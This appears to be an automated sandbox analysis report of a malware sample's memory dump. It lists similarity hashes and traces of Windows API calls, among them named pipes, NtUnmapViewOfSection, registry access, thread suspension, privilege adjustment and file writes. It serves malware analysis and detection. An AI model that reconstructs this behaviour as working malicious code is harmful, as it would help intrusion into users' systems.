  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
